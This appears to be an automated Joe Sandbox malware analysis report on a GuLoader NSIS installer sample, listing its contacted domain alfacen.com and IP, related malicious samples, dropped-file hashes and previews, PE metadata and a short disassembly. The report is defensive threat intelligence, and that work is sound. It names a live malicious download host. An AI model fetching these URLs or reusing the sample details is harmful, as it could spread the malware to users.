              http://nsis.sf.net/NSIS_ErrorError0GuwV0t2UU.exe, 00000000.00000000.2116328758.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000000.00000002.3135422638.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 0GuwV0t2UU.exe, 00000006.00000000.3132180633.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                high
                https://alfacen.com/0GuwV0t2UU.exe, 00000006.00000002.3541181900.0000000007813000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://alfacen.com/&K0GuwV0t2UU.exe, 00000006.00000002.3541181900.0000000007813000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140GuwV0t2UU.exe, 00000006.00000001.3135162309.0000000000649000.00000008.00000001.01000000.00000006.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  193.107.36.30
                  alfacen.comBulgaria
                  201200SUPERHOSTING_ASBGfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1549467
                  Start date and time:2024-11-05 16:57:20 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:0GuwV0t2UU.exe
                  renamed because original name is a hash value
                  Original Sample Name:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff.exe
                  Detection:MAL
                  Classification:mal84.troj.evad.winEXE@3/9@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 90%
                  • Number of executed functions: 56
                  • Number of non-executed functions: 307
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: 0GuwV0t2UU.exe
                  TimeTypeDescription
                  11:00:31API Interceptor3x Sleep call for process: 0GuwV0t2UU.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  193.107.36.30450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                    450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                      3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                        3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                          Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                            Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                              SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  alfacen.com450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  SUPERHOSTING_ASBGRob.Kuster@stonhard.com.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                  • 185.45.66.155
                                  zip file.zipGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                  • 185.45.66.155
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  450707124374000811.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  3507071243740008011.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  Potwierdzenie.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  SKM_C25024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  37f463bf4616ecd445d4a1937da06e19lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                  • 193.107.36.30
                                  eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  374UU58JVt.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 193.107.36.30
                                  eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  REnBTVfW8q.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 193.107.36.30
                                  kzTEwlPWa0.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  ulf4JrCRk2.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 193.107.36.30
                                  Nt8BLNLKN7.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 193.107.36.30
                                  LqtjSIsoCg.exeGet hashmaliciousGuLoaderBrowse
                                  • 193.107.36.30
                                  EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                  • 193.107.36.30
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\Users\user\AppData\Local\Temp\nsiBDD8.tmp\System.dlleXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                    eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                      NacahSetup.exeGet hashmaliciousUnknownBrowse
                                        NacahSetup.exeGet hashmaliciousUnknownBrowse
                                          PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              Brneforsorgspdagogers.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                Bestellung.vbsGet hashmaliciousGuLoaderBrowse
                                                  Bestellung_101624.vbsGet hashmaliciousGuLoaderBrowse
                                                    SKM_C16024100408500.vbsGet hashmaliciousGuLoaderBrowse
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):12288
                                                      Entropy (8bit):5.804946284177748
                                                      Encrypted:false
                                                      SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                      MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                      SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                      SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                      SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                      Malicious:false
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                                      • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                                      • Filename: NacahSetup.exe, Detection: malicious, Browse
                                                      • Filename: NacahSetup.exe, Detection: malicious, Browse
                                                      • Filename: PO-33463334788.exe, Detection: malicious, Browse
                                                      • Filename: Brneforsorgspdagogers.exe, Detection: malicious, Browse
                                                      • Filename: Brneforsorgspdagogers.exe, Detection: malicious, Browse
                                                      • Filename: Bestellung.vbs, Detection: malicious, Browse
                                                      • Filename: Bestellung_101624.vbs, Detection: malicious, Browse
                                                      • Filename: SKM_C16024100408500.vbs, Detection: malicious, Browse
                                                      Reputation:moderate, very likely benign file
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1946975
                                                      Entropy (8bit):2.806117804909863
                                                      Encrypted:false
                                                      SSDEEP:12288:rR9mfmPGpuRRZ8fzb4ylVIXRmOE6gKEiW/aSz:F8cSuxqb4SVmRrg7/aSz
                                                      MD5:5B3BB2247C7ECBB474B9D2DAD6B48F7F
                                                      SHA1:4796B4FB3B381194AD4402FD32B6EA0DBCB90C56
                                                      SHA-256:8AF0A5CC73F2E6AF20549B6B19A0E36BB8237D4F55F21AC9A0BA96DD1B188EFF
                                                      SHA-512:933549DD6B71638B9775C9F536C56BE5F5BEF0E65D94A580DB9D64CF68BC870F51110153445F300E9D3C9B5E34E35BAF35158EEC7A685FB6D3C6262F5A8706F2
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:vJ......,.......,.......\.......`-......DI......FJ...........................................................v..............................................................................................................................................................................G...Z...............h...............................................................g...............................................................j.............................................................................................................................../.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):303518
                                                      Entropy (8bit):7.693063601326674
                                                      Encrypted:false
                                                      SSDEEP:6144:ymfmP8hrVppgNRAGvMptu8fZZ7zbm3IkyZXV1ytd8fkW9ZoE6z:ymfmPGpuRRZ8fzb4ylVIXRmOE6z
                                                      MD5:51581B43F9E295BE259A5A956CF2DA8F
                                                      SHA1:2223CD8EB3D3F4588EBAA556C334B7B31931E5F6
                                                      SHA-256:B5B3ACFB1E514A8EEFDBF28AFB9672B9DBB205A429A215CC70C9762D61DE0A40
                                                      SHA-512:07CCA659E1C9E7A144710FF35388668DA21C0EAE6D876EF3062BF4482D3DD62F710DA6085666B80C3717BAA6FEBA71244D055B17549BB527FF21CCB704B4B779
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:....................,...A... ........Y.. ................j............CCC.P.........~.........==.....k...........8888...........0....wwww.....&............nn.....HHH.{{........~.fff.....p...&...-...jj....................................00.vvv..................v......2......]]].....k..&.....mm.................J.X.........g..o...............i....!....bbb.............................B................G...............V..qq...................;;;.....nnn........../.'..............................................1..Q.=.3............0...........%%%%%.I.....2.111111. .).............................=......k.:...........kk.kk.....C..h......'..............K...................\\\......f........www.c....................................................QQ...z...:............l..............$$$$............5.......aaa.J..\\..SS...FFF..............4444...........@@..NNNN.......:.^..++......................~......>.N...................q.........II........8.............).........................>.......
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):69084
                                                      Entropy (8bit):4.603760453423635
                                                      Encrypted:false
                                                      SSDEEP:1536:7z9lFzNYTn70XJGL4lb6Wl5ExQHzQmlhrBl48V:FDBI70XcGbn5EeHznxoq
                                                      MD5:ACB2833B890437599A3E6A332916AC8D
                                                      SHA1:4D80FEDC90EFDF3F68AD05F71E4DA687084EF8C4
                                                      SHA-256:1F7C38980704550B4E915F4137F30004BBF3EC81BCC61ADB7E88C6D9DE343E45
                                                      SHA-512:6B4BEE3FACED797A01920BE6230244E901E35706FE4274FF1625AEAB1C5DD9D61CDDE173596B2311DCA9344DF0E6B41585E5788CAADDA62E8FB8B1C312F433CF
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...Z...U...{{....................]...b....................................O.[[.mm..............Q......................N.........[[...........(.WW....;.UU.jj............J....................................ttt."......................\..`..........w.........`............P.@....%%...{....ooo.................................................}}}}}}}}.....??...ww...VVVV...........JJ.....................*******........1...............iiiii...........TTT.......7..............___.`.......0................{.......hh...~~....*........................iii......................d.kk.}.OO...............?...j.........qq..CCC..'.......f.ggg...............!!......TTT..7...w........OO.........''.....TT..............cc.}}}.......%..((.....o.............**..b...............tttt........................^.................XXX....................Y...........t.llll.....LL..P........R.FF.=.....$.R.....++.}..............h......}}}}}.....T.::::..v.FF.U.....ss................x.......ggg.................. ........
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):449187
                                                      Entropy (8bit):1.237422861698846
                                                      Encrypted:false
                                                      SSDEEP:1536:eC1rHCXyOIiJOV+okMSfFtaFhH6FSr75qYdB04whG:eC1r5OIiJz/iXH6FSr7IIrwhG
                                                      MD5:CA16C710B6F58865710B74F64D516AC5
                                                      SHA1:E67537C4BC3C64F4085305F81C5595732E36E9CD
                                                      SHA-256:251E742EEC6E46D3FA512EB3CE25A2DDEF371CFF7E5F3596D98F1BBCD028ED6F
                                                      SHA-512:9ED1024823C038B7CF951ECD73779EB492B0D858994848A752F36A7480BB573AA032E3C5684697A0AD89F8DE189460D236A3015805F450D0F5703B84E873AF3A
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...................................................."........../.......................T.....................v........j.......................(...........................................................Q......................................................................................................................................................................Z........................D................................^..........................................................T......................................................}.....m...+.......................................$.............G............b......................@...................................................................y............................B.........................6....................*................!......6.....................................{...................<../..........C.....................................................;......................................................8........
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):465587
                                                      Entropy (8bit):1.258057339820465
                                                      Encrypted:false
                                                      SSDEEP:768:5ey7/lr4xtCx8bJJGSu+O+sKqBXJwdTd7QJTB4+3GIc+u0ehBDl2jkv7qfadwjus:zOrUXKKtq6s5Jj3X1ir
                                                      MD5:F7A3A6A56220B4F010490D77066CC809
                                                      SHA1:658A58A63948A2E3D2DAA133F1A962090C6F56B5
                                                      SHA-256:78052B085ECF2B27FA90AD47EA7DA69AF0FE075FD81FA4F62DEE0324912062FD
                                                      SHA-512:B7AAA9767FB1FDE4948678AF664567126926311ECDA34C3D6C0F01C36DD126FC9233CEFDE6A0CDFC200B716143F4FA333B7F3039BDC145376B1AA67C820DC3BD
                                                      Malicious:false
                                                      Preview:....................".................................A........v.........................................................................G.......................T.......................................................................................................N...........................J..................s......`.................>.......>..........._._.i.....................................................................................................................................4...........................m....................<...............ry....s.........Z...................B.................................^..............$...........................a...........................................q...........................B........................................................5...............................................l.........................@........p.........................................................................................7.......i.........E....
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):464
                                                      Entropy (8bit):4.2785660816531506
                                                      Encrypted:false
                                                      SSDEEP:6:eAbLsAJn+tmAXRbALVWHy5qLCA0Ybl/3WYJUXq19F0zXZ6Zy65YMEAHbzMa3GeQk:UAmCvOD0YdeX8ioZ/THZ2evzBb1
                                                      MD5:0B2D2CB964A22694778B3639FB67E1D0
                                                      SHA1:75EC16F528D750772DA87CF82B89AEAE9651CD2C
                                                      SHA-256:604E104ADEDA28672779957466B71CF51B610BDEA5A1C3D54084CBA0C239ED1C
                                                      SHA-512:1357F9129AA23F546CE5F4F9821C209928D39109E67F273A83914E25F7BA9D10A7A2D0ACD44AE507FCAC9B88780CFAD371508403E95FD56520CBC31AB3793F4E
                                                      Malicious:false
                                                      Preview:unrepentant underdrive unnovel megalopore learchus samletank overbait fluevgteren studio sportsfly..appellabelt centro ttninger forhaabnings nrarucu uddataskemaernes,tyvekronesedlens reproduktioner gevirer mikrofonens anbefalelsesvrdigstes podargidae knapstvlers..arculite riningerne autoriserings pyrotechnician chatelaines percolating.pluripartite biavl physiopathologic recoloration sapful creedalist,windermost fibrocytic vandpest oakenshaw genopfrtes caitiff.
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):355322
                                                      Entropy (8bit):1.248668847963627
                                                      Encrypted:false
                                                      SSDEEP:768:aMrIrJVUmy9wRXGk+LZS+DgA/uaOPNAaT2jd9JE66AUw0oGjg3cSnZSSM/iu8MRt:7wcjuacoqXjg3hgNltIS1vB/E8g
                                                      MD5:F7F3749CDD0D5BADCBB47E3D35654BF1
                                                      SHA1:889CA65BD3EDAFCCDB90C2CA5C72185A6FEC3436
                                                      SHA-256:8CD826E589CDBAB5B02AE83033424D4CC0B0E3DCACAEB207F7D20CA917022564
                                                      SHA-512:5BDA06183A804C9E4172293F48F74745A02533FACF8604542EA39E4C38DBD1A7ACACB1DD1AB158A635C1CD1E0B19698127CA97CCD6AA16D0EEEAEAF22555B1B0
                                                      Malicious:false
                                                      Preview:.................................................................|........................................................A....X.o.......................U...........q......................................(.......................................................|......................................................................._...}.......................................g.................................&..............................................................................7.t....F.........................$...T.............7.............w.........................................................d............................................................................................................}..........N....................!.#.....*.............b............................b..M.....M........S................P...............G................&....h......H..........................}..........i....f.................................e.'..<k...../.s........................
                                                      Process:C:\Users\user\Desktop\0GuwV0t2UU.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):272420
                                                      Entropy (8bit):1.2471254394709002
                                                      Encrypted:false
                                                      SSDEEP:768:NOeUjZIwSV6Se8pPwkdZ2SxUP4j9DT+IOIJlHzvV1faN65lsDNa7NeOc7LJBasrJ:dC/OZB9JVoRaY4D7J8upv
                                                      MD5:783A67D1245251BF34509DDED7A2CA06
                                                      SHA1:287C1C8C5F2D3B3FA1318BA9791F4E5E07B7BBB2
                                                      SHA-256:CCD706F520EDD8D081FBF244EE365A41D16E9246185574F2C4A1DC3A9F30D423
                                                      SHA-512:C92989CE6A1C1B7A94A44D307B4A002E7B9AAD02CF8DF9FB0385FD4F4695E60DAF026CC8C3D60AAE7868DC39C4276AE373C1AD9A216C3E0606EEF64E45ED5F63
                                                      Malicious:false
                                                      Preview:...........6................................................................e..............j.............................................................V..............................t.................................f.....................>........F...k.............................................r...........:..........................................................P.......a......................Z...................................................Q....................................../..............I..............................."..............._..........#.....<.#.................L............................................................K.........]......................................f....................W..............0......R.........@........................................................................................................3...}...............b..............................................a......................................................(...............
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Entropy (8bit):7.6558481961369464
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:0GuwV0t2UU.exe
                                                      File size:695'648 bytes
                                                      MD5:4ea3d3a468f53ca1b57d8c2db7eb3037
                                                      SHA1:cf31eb62d544ebef441f5d2cc2e219d65bd43ad6
                                                      SHA256:d29146778b6cd9ce8c5d12a8f3fc16a9d25bdc27d2588bb0e70d57728deb0fff
                                                      SHA512:5cec7ea3d2dca84434c81510239b7a246a0505a22fd8fa228e84b1b681125f029d3925401e74379ec2888b4074e976e0f4156c8644ace4188350ad5dc93c7679
                                                      SSDEEP:12288:hHadgT2v16lXEF/iUX4g2X2GSNsZNRXcQTnFUJANXhX96kONav45bvriL5:hadgTvEF/N8X6N2bXc+FUWNhX96lNaYO
                                                      TLSH:DAE422069153E4A2C70A027326BBD8C5BEB9AC905DE7270B33C4771EF871AA5372D647
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................h...".....
                                                      Icon Hash:e0f0335d4b2a1d03
                                                      Entrypoint:0x403665
                                                      Entrypoint Section:.text
                                                      Digitally signed:true
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x660843F7 [Sat Mar 30 16:55:19 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:9dda1a1d1f8a1d13ae0297b47046b26e
                                                      Signature Valid:false
                                                      Signature Issuer:CN=Foveolated, O=Foveolated, L=Planques, C=FR
                                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                      Error Number:-2146762487
                                                      Not Before, Not After
                                                      • 23/10/2023 07:08:06 22/10/2026 07:08:06
                                                      Subject Chain
                                                      • CN=Foveolated, O=Foveolated, L=Planques, C=FR
                                                      Version:3
                                                      Thumbprint MD5:B3D4604C2060C6978097D6AB24477EAD
                                                      Thumbprint SHA-1:664888114D2755CF0E73738AB7F82FDE35B91E70
                                                      Thumbprint SHA-256:17C7E666BBA1B7DB350FD2AF565FE572F65B43C72CC7C8FB5C9437AA4913DC6C
                                                      Serial:3F1543551EB9D1508CF6F4C1F6F718CD5555CA59
                                                      Instruction
                                                      sub esp, 000003F8h
                                                      push ebp
                                                      push esi
                                                      push edi
                                                      push 00000020h
                                                      pop edi
                                                      xor ebp, ebp
                                                      push 00008001h
                                                      mov dword ptr [esp+20h], ebp
                                                      mov dword ptr [esp+18h], 0040A230h
                                                      mov dword ptr [esp+14h], ebp
                                                      call dword ptr [004080A0h]
                                                      mov esi, dword ptr [004080A4h]
                                                      lea eax, dword ptr [esp+34h]
                                                      push eax
                                                      mov dword ptr [esp+4Ch], ebp
                                                      mov dword ptr [esp+0000014Ch], ebp
                                                      mov dword ptr [esp+00000150h], ebp
                                                      mov dword ptr [esp+38h], 0000011Ch
                                                      call esi
                                                      test eax, eax
                                                      jne 00007F09C4DDCB4Ah
                                                      lea eax, dword ptr [esp+34h]
                                                      mov dword ptr [esp+34h], 00000114h
                                                      push eax
                                                      call esi
                                                      mov ax, word ptr [esp+48h]
                                                      mov ecx, dword ptr [esp+62h]
                                                      sub ax, 00000053h
                                                      add ecx, FFFFFFD0h
                                                      neg ax
                                                      sbb eax, eax
                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                      not eax
                                                      and eax, ecx
                                                      mov word ptr [esp+00000148h], ax
                                                      cmp dword ptr [esp+38h], 0Ah
                                                      jnc 00007F09C4DDCB18h
                                                      and word ptr [esp+42h], 0000h
                                                      mov eax, dword ptr [esp+40h]
                                                      movzx ecx, byte ptr [esp+3Ch]
                                                      mov dword ptr [00429B18h], eax
                                                      xor eax, eax
                                                      mov ah, byte ptr [esp+38h]
                                                      movzx eax, ax
                                                      or eax, ecx
                                                      xor ecx, ecx
                                                      mov ch, byte ptr [esp+00000148h]
                                                      movzx ecx, cx
                                                      shl eax, 10h
                                                      or eax, ecx
                                                      movzx ecx, byte ptr [esp+0000004Eh]
                                                      Programming Language:
                                                      • [EXP] VC++ 6.0 SP5 build 8804
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x610000x15c78.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xa7a980x22c8
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x66d70x68004e97e586f167bf2d2eddcdba22e25c0eFalse0.6615835336538461data6.441769857560007IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x80000x13580x1400bd82d08a08da8783923a22b467699302False0.4431640625data5.103358601944578IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xa0000x1fb780x600e411b225ac3cd03a5dad8143ae82958dFalse0.5091145833333334data4.122928093833695IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .ndata0x2a0000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x610000x15c780x15e007636c8e4ac23a636cec56c6e37b6ad74False0.27889508928571427data3.292626744838751IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_BITMAP0x613280x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                      RT_ICON0x616900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.25977463622382585
                                                      RT_ICON0x71eb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3216804979253112
                                                      RT_ICON0x744600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.349437148217636
                                                      RT_ICON0x755080x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.3959016393442623
                                                      RT_ICON0x75e900x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.4370567375886525
                                                      RT_DIALOG0x762f80x144dataEnglishUnited States0.5216049382716049
                                                      RT_DIALOG0x764400x13cdataEnglishUnited States0.5506329113924051
                                                      RT_DIALOG0x765800x120dataEnglishUnited States0.5138888888888888
                                                      RT_DIALOG0x766a00x11cdataEnglishUnited States0.6056338028169014
                                                      RT_DIALOG0x767c00xc4dataEnglishUnited States0.5918367346938775
                                                      RT_DIALOG0x768880x60dataEnglishUnited States0.7291666666666666
                                                      RT_GROUP_ICON0x768e80x4cdataEnglishUnited States0.8157894736842105
                                                      RT_MANIFEST0x769380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                      DLLImport
                                                      ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                      SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                      ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
